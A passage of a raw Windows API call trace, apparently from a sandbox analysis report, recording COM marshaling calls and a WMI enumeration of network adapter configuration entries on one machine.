Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e9bc | out: ppvObject=0x19e9bc*=0x0) returned 0x80004002 [0178.419] WbemLocator:IUnknown:AddRef (This=0x5b0630) returned 0x3 [0178.419] WbemLocator:IUnknown:QueryInterface (in: This=0x5b0630, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e71c | out: ppvObject=0x19e71c*=0x0) returned 0x80004002 [0178.419] WbemLocator:IUnknown:QueryInterface (in: This=0x5b0630, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e6cc | out: ppvObject=0x19e6cc*=0x0) returned 0x80004002 [0178.419] WbemLocator:IUnknown:QueryInterface (in: This=0x5b0630, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e6d8 | out: ppvObject=0x19e6d8*=0x5b058c) returned 0x0 [0178.420] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x5b058c, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e6e0 | out: pCid=0x19e6e0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0178.420] WbemLocator:IUnknown:Release (This=0x5b058c) returned 0x3 [0178.420] CoGetContextToken (in: pToken=0x19e738 | out: pToken=0x19e738) returned 0x0 [0178.420] CoGetContextToken (in: pToken=0x19eb40 | out: pToken=0x19eb40) returned 0x0 [0178.420] WbemLocator:IUnknown:QueryInterface (in: This=0x5b0630, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ebcc | out: ppvObject=0x19ebcc*=0x5b0614) returned 0x0 [0178.420] WbemLocator:IRpcOptions:Query (in: This=0x5b0614, pPrx=0x5b0630, dwProperty=2, pdwValue=0x19ebd8 | out: pdwValue=0x19ebd8) returned 0x80004002 [0178.420] WbemLocator:IUnknown:Release (This=0x5b0614) returned 0x3 [0178.420] WbemLocator:IUnknown:Release (This=0x5b0630) returned 0x2 [0178.420] CoGetContextToken (in: pToken=0x19f118 | out: pToken=0x19f118) returned 0x0 [0178.420] CoGetContextToken (in: pToken=0x19f078 | out: pToken=0x19f078) returned 0x0 [0178.421] WbemLocator:IUnknown:QueryInterface (in: This=0x5b0630, riid=0x19f148*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x19f144 | out: ppvObject=0x19f144*=0x599f88) returned 0x0 [0178.421] IUnknown:AddRef (This=0x599f88) returned 0x4 [0178.421] IUnknown:Release (This=0x599f88) returned 0x3 [0178.421] IUnknown:Release (This=0x599f88) returned 0x2 [0178.421] WbemLocator:IUnknown:Release (This=0x57d640) returned 0x2 [0178.421] SysStringLen (param_1=0x0) returned 0x0 [0178.421] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594200, puCount=0x19f3f4 | out: puCount=0x19f3f4*=0x2) returned 0x0 [0178.421] WbemDefPath:IWbemPath:GetText (in: This=0x594200, lFlags=4, puBuffLength=0x19f3f0*=0x0, pszText=0x0 | out: puBuffLength=0x19f3f0*=0xf, pszText=0x0) returned 0x0 [0178.421] WbemDefPath:IWbemPath:GetText (in: This=0x594200, lFlags=4, puBuffLength=0x19f3f0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f3f0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0178.421] CoGetContextToken (in: pToken=0x19f238 | out: pToken=0x19f238) returned 0x0 [0178.421] IUnknown:AddRef (This=0x599f88) returned 0x3 [0178.421] IEnumWbemClassObject:Clone (in: This=0x599f88, ppEnum=0x19f3f4 | out: ppEnum=0x19f3f4*=0x59a690) returned 0x0 [0178.511] IUnknown:QueryInterface (in: This=0x59a690, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f2b0 | out: ppvObject=0x19f2b0*=0x59a694) returned 0x0 [0178.512] IClientSecurity:QueryBlanket (in: This=0x59a694, pProxy=0x59a690, pAuthnSvc=0x19f300, pAuthzSvc=0x19f2fc, pServerPrincName=0x19f2f4, pAuthnLevel=0x19f2f8, pImpLevel=0x19f2e8, pAuthInfo=0x19f2ec, pCapabilites=0x19f2f0 | out: pAuthnSvc=0x19f300*=0xa, pAuthzSvc=0x19f2fc*=0x0, pServerPrincName=0x19f2f4, pAuthnLevel=0x19f2f8*=0x6, pImpLevel=0x19f2e8*=0x2, pAuthInfo=0x19f2ec, pCapabilites=0x19f2f0*=0x1) returned 0x0 [0178.512] IUnknown:Release (This=0x59a694) returned 0x1 [0178.512] IUnknown:QueryInterface (in: This=0x59a690, riid=0x65a61224*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f2a4 | out: ppvObject=0x19f2a4*=0x5b0b30) returned 0x0 [0178.512] IUnknown:QueryInterface (in: This=0x59a690, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f290 | out: ppvObject=0x19f290*=0x59a694) returned 0x0 [0178.512] IClientSecurity:SetBlanket (This=0x59a694, pProxy=0x59a690, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0178.615] IUnknown:Release (This=0x59a694) returned 0x2 [0178.615] WbemLocator:IUnknown:Release (This=0x5b0b30) returned 0x1 [0178.615] CoTaskMemFree (pv=0x5988b8) [0178.615] IUnknown:QueryInterface (in: This=0x59a690, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ee8c | out: ppvObject=0x19ee8c*=0x5b0b30) returned 0x0 [0178.616] WbemLocator:IUnknown:QueryInterface (in: This=0x5b0b30, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ee48 | out: ppvObject=0x19ee48*=0x0) returned 0x80004002 [0178.671] WbemLocator:IUnknown:QueryInterface (in: This=0x5b0b30, riid=0x69519bb4*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ec64 | out: ppvObject=0x19ec64*=0x0) returned 0x80004002 [0178.741] IUnknown:QueryInterface (in: This=0x59a690, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19ea3c | out: ppvObject=0x19ea3c*=0x0) returned 0x80004002 [0178.756] WbemLocator:IUnknown:AddRef (This=0x5b0b30) returned 0x3 [0178.756] WbemLocator:IUnknown:QueryInterface (in: This=0x5b0b30, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e79c | out: ppvObject=0x19e79c*=0x0) returned 0x80004002 [0178.756] WbemLocator:IUnknown:QueryInterface (in: This=0x5b0b30, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e74c | out: ppvObject=0x19e74c*=0x0) returned 0x80004002 [0178.756] WbemLocator:IUnknown:QueryInterface (in: This=0x5b0b30, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e758 | out: ppvObject=0x19e758*=0x5b0a8c) returned 0x0 [0178.757] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x5b0a8c, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e760 | out: pCid=0x19e760*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0178.757] WbemLocator:IUnknown:Release (This=0x5b0a8c) returned 0x3 [0178.757] CoGetContextToken (in: pToken=0x19e7b8 | out: pToken=0x19e7b8) returned 0x0 [0178.757] CoGetContextToken (in: pToken=0x19ebc0 | out: pToken=0x19ebc0) returned 0x0 [0178.757] WbemLocator:IUnknown:QueryInterface (in: This=0x5b0b30, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ec4c | out: ppvObject=0x19ec4c*=0x5b0b14) returned 0x0 [0178.757] WbemLocator:IRpcOptions:Query (in: This=0x5b0b14, pPrx=0x5b0b30, dwProperty=2, pdwValue=0x19ec58 | out: pdwValue=0x19ec58) returned 0x80004002 [0178.757] WbemLocator:IUnknown:Release (This=0x5b0b14) returned 0x3 [0178.757] WbemLocator:IUnknown:Release (This=0x5b0b30) returned 0x2 [0178.757] CoGetContextToken (in: pToken=0x19f1a0 | out: pToken=0x19f1a0) returned 0x0 [0178.757] CoGetContextToken (in: pToken=0x19f100 | out: pToken=0x19f100) returned 0x0 [0178.757] WbemLocator:IUnknown:QueryInterface (in: This=0x5b0b30, riid=0x19f1d0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x19f1cc | out: ppvObject=0x19f1cc*=0x59a690) returned 0x0 [0178.757] IUnknown:AddRef (This=0x59a690) returned 0x4 [0178.757] IUnknown:Release (This=0x59a690) returned 0x3 [0178.757] IUnknown:Release (This=0x59a690) returned 0x2 [0178.757] IUnknown:Release (This=0x599f88) returned 0x2 [0178.757] SysStringLen (param_1=0x0) returned 0x0 [0178.757] IEnumWbemClassObject:Reset (This=0x59a690) returned 0x0 [0178.761] CoTaskMemAlloc (cb=0x4) returned 0x596e18 [0178.761] IEnumWbemClassObject:Next (in: This=0x59a690, lTimeout=-1, uCount=0x1, apObjects=0x596e18, puReturned=0x22fb57c | out: apObjects=0x596e18*=0x517e90, puReturned=0x22fb57c*=0x1) returned 0x0 [0178.771] IUnknown:QueryInterface (in: This=0x517e90, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ea50 | out: ppvObject=0x19ea50*=0x517e90) returned 0x0 [0178.772] IUnknown:QueryInterface (in: This=0x517e90, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ea0c | out: ppvObject=0x19ea0c*=0x0) returned 0x80004002 [0178.772] IUnknown:QueryInterface (in: This=0x517e90, riid=0x69519bb4*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e82c | out: ppvObject=0x19e82c*=0x0) returned 0x80004002 [0178.772] IUnknown:QueryInterface (in: This=0x517e90, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e604 | out: ppvObject=0x19e604*=0x0) returned 0x80004002 [0178.772] IUnknown:AddRef (This=0x517e90) returned 0x3 [0178.772] IUnknown:QueryInterface (in: This=0x517e90, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e364 | out: ppvObject=0x19e364*=0x0) returned 0x80004002 [0178.772] IUnknown:QueryInterface (in: This=0x517e90, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e314 | out: ppvObject=0x19e314*=0x0) returned 0x80004002 [0178.772] IUnknown:QueryInterface (in: This=0x517e90, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e320 | out: ppvObject=0x19e320*=0x517e94) returned 0x0 [0178.772] IMarshal:GetUnmarshalClass (in: This=0x517e94, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e328 | out: pCid=0x19e328*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0178.772] IUnknown:Release (This=0x517e94) returned 0x3 [0178.772] CoGetContextToken (in: pToken=0x19e380 | out: pToken=0x19e380) returned 0x0 [0178.772] CoGetContextToken (in: pToken=0x19e788 | out: pToken=0x19e788) returned 0x0 [0178.773] IUnknown:QueryInterface (in: This=0x517e90, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e814 | out: ppvObject=0x19e814*=0x0) returned 0x80004002 [0178.773] IUnknown:Release (This=0x517e90) returned 0x2 [0178.773] CoGetContextToken (in: pToken=0x19ed60 | out: pToken=0x19ed60) returned 0x0 [0178.773] CoGetContextToken (in: pToken=0x19ecc0 | out: pToken=0x19ecc0) returned 0x0 [0178.773] IUnknown:QueryInterface (in: This=0x517e90, riid=0x19ed90*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19ed8c | out: ppvObject=0x19ed8c*=0x517e90) returned 0x0 [0178.773] IUnknown:AddRef (This=0x517e90) returned 0x4 [0178.773] IUnknown:Release (This=0x517e90) returned 0x3 [0178.773] IUnknown:Release (This=0x517e90) returned 0x2 [0178.773] CoTaskMemFree (pv=0x596e18) [0178.773] CoGetContextToken (in: pToken=0x19f0d0 | out: pToken=0x19f0d0) returned 0x0 [0178.773] IUnknown:AddRef (This=0x517e90) returned 0x3 [0178.773] IWbemClassObject:Get (in: This=0x517e90, wszName="__GENUS", lFlags=0, pVal=0x19f3e4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f464*=0, plFlavor=0x19f460*=0 | out: pVal=0x19f3e4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f464*=3, plFlavor=0x19f460*=64) returned 0x0 [0178.773] IWbemClassObject:Get (in: This=0x517e90, wszName="__PATH", lFlags=0, pVal=0x19f3c8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f44c*=0, plFlavor=0x19f448*=0 | out: pVal=0x19f3c8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=0", varVal2=0x0), pType=0x19f44c*=8, plFlavor=0x19f448*=64) returned 0x0 [0178.773] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=0") returned 0x7a [0178.773] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=0") returned 0x7a [0178.773] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x458 [0178.773] SetEvent (hEvent=0x3b4) returned 1 [0178.774] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x19f3a0*=0x458, lpdwindex=0x19f1bc | out: lpdwindex=0x19f1bc) returned 0x0 [0178.776] CoGetContextToken (in: pToken=0x19f270 | out: pToken=0x19f270) returned 0x0 [0178.776] CoGetContextToken (in: pToken=0x19f1d0 | out: pToken=0x19f1d0) returned 0x0 [0178.776] WbemDefPath:IUnknown:QueryInterface (in: This=0x5942e0, riid=0x19f2a0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f29c | out: ppvObject=0x19f29c*=0x5942e0) returned 0x0 [0178.776] WbemDefPath:IUnknown:AddRef (This=0x5942e0) returned 0x3 [0178.776] WbemDefPath:IUnknown:Release (This=0x5942e0) returned 0x2 [0178.776] WbemDefPath:IWbemPath:SetText (This=0x5942e0, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=0") returned 0x0 [0178.777] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594200, puCount=0x19f420 | out: puCount=0x19f420*=0x2) returned 0x0 [0178.777] WbemDefPath:IWbemPath:GetText (in: This=0x594200, lFlags=4, puBuffLength=0x19f41c*=0x0, pszText=0x0 | out: puBuffLength=0x19f41c*=0xf, pszText=0x0) returned 0x0 [0178.777] WbemDefPath:IWbemPath:GetText (in: This=0x594200, lFlags=4, puBuffLength=0x19f41c*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f41c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0178.779] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594200, puCount=0x19f3ec | out: puCount=0x19f3ec*=0x2) returned 0x0 [0178.779] WbemDefPath:IWbemPath:GetText (in: This=0x594200, lFlags=4, puBuffLength=0x19f3e8*=0x0, pszText=0x0 | out: puBuffLength=0x19f3e8*=0xf, pszText=0x0) returned 0x0 [0178.779] WbemDefPath:IWbemPath:GetText (in: This=0x594200, lFlags=4, puBuffLength=0x19f3e8*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f3e8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0178.780] IWbemClassObject:Get (in: This=0x517e90, wszName="IPEnabled", lFlags=0, pVal=0x19f3e8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x22fbe14*=0, plFlavor=0x22fbe18*=0 | out: pVal=0x19f3e8*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x22fbe14*=11, plFlavor=0x22fbe18*=0) returned 0x0 [0178.780] IWbemClassObject:Get (in: This=0x517e90, wszName="IPEnabled", lFlags=0, pVal=0x19f3f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x22fbe14*=11, plFlavor=0x22fbe18*=0 | out: pVal=0x19f3f0*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x22fbe14*=11, plFlavor=0x22fbe18*=0) returned 0x0 [0178.807] IUnknown:Release (This=0x517e90) returned 0x2 [0178.809] CoTaskMemAlloc (cb=0x4) returned 0x596e78 [0178.809] IEnumWbemClassObject:Next (in: This=0x59a690, lTimeout=-1, uCount=0x1, apObjects=0x596e78, puReturned=0x22fb57c | out: apObjects=0x596e78*=0x5766d8, puReturned=0x22fb57c*=0x1) returned 0x0 [0178.812] IUnknown:QueryInterface (in: This=0x5766d8, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ea50 | out: ppvObject=0x19ea50*=0x5766d8) returned 0x0 [0178.813] IUnknown:QueryInterface (in: This=0x5766d8, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ea0c | out: ppvObject=0x19ea0c*=0x0) returned 0x80004002 [0178.813] IUnknown:QueryInterface (in: This=0x5766d8, riid=0x69519bb4*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e82c | out: ppvObject=0x19e82c*=0x0) returned 0x80004002 [0178.813] IUnknown:QueryInterface (in: This=0x5766d8, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e604 | out: ppvObject=0x19e604*=0x0) returned 0x80004002 [0178.813] IUnknown:AddRef (This=0x5766d8) returned 0x3 [0178.813] IUnknown:QueryInterface (in: This=0x5766d8, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e364 | out: ppvObject=0x19e364*=0x0) returned 0x80004002 [0178.813] IUnknown:QueryInterface (in: This=0x5766d8, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e314 | out: ppvObject=0x19e314*=0x0) returned 0x80004002 [0178.813] IUnknown:QueryInterface (in: This=0x5766d8, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e320 | out: ppvObject=0x19e320*=0x5766dc) returned 0x0 [0178.813] IMarshal:GetUnmarshalClass (in: This=0x5766dc, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e328 | out: pCid=0x19e328*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0178.813] IUnknown:Release (This=0x5766dc) returned 0x3 [0178.813] CoGetContextToken (in: pToken=0x19e380 | out: pToken=0x19e380) returned 0x0 [0178.814] CoGetContextToken (in: pToken=0x19e788 | out: pToken=0x19e788) returned 0x0 [0178.814] IUnknown:QueryInterface (in: This=0x5766d8, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e814 | out: ppvObject=0x19e814*=0x0) returned 0x80004002 [0178.814] IUnknown:Release (This=0x5766d8) returned 0x2 [0178.814] CoGetContextToken (in: pToken=0x19ed60 | out: pToken=0x19ed60) returned 0x0 [0178.814] CoGetContextToken (in: pToken=0x19ecc0 | out: pToken=0x19ecc0) returned 0x0 [0178.814] IUnknown:QueryInterface (in: This=0x5766d8, riid=0x19ed90*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19ed8c | out: ppvObject=0x19ed8c*=0x5766d8) returned 0x0 [0178.814] IUnknown:AddRef (This=0x5766d8) returned 0x4 [0178.814] IUnknown:Release (This=0x5766d8) returned 0x3 [0178.814] IUnknown:Release (This=0x5766d8) returned 0x2 [0178.814] CoTaskMemFree (pv=0x596e78) [0178.814] CoGetContextToken (in: pToken=0x19f0d0 | out: pToken=0x19f0d0) returned 0x0 [0178.814] IUnknown:AddRef (This=0x5766d8) returned 0x3 [0178.814] IWbemClassObject:Get (in: This=0x5766d8, wszName="__GENUS", lFlags=0, pVal=0x19f3e4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f464*=0, plFlavor=0x19f460*=0 | out: pVal=0x19f3e4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f464*=3, plFlavor=0x19f460*=64) returned 0x0 [0178.814] IWbemClassObject:Get (in: This=0x5766d8, wszName="__PATH", lFlags=0, pVal=0x19f3c8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f44c*=0, plFlavor=0x19f448*=0 | out: pVal=0x19f3c8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=1", varVal2=0x0), pType=0x19f44c*=8, plFlavor=0x19f448*=64) returned 0x0 [0178.814] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=1") returned 0x7a [0178.814] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=1") returned 0x7a [0178.814] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x45c [0178.814] SetEvent (hEvent=0x3b4) returned 1 [0178.815] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x19f3a0*=0x45c, lpdwindex=0x19f1bc | out: lpdwindex=0x19f1bc) returned 0x0 [0178.817] CoGetContextToken (in: pToken=0x19f270 | out: pToken=0x19f270) returned 0x0 [0178.817] CoGetContextToken (in: pToken=0x19f1d0 | out: pToken=0x19f1d0) returned 0x0 [0178.817] WbemDefPath:IUnknown:QueryInterface (in: This=0x5945f0, riid=0x19f2a0*(Data1=0x3bc15af2, 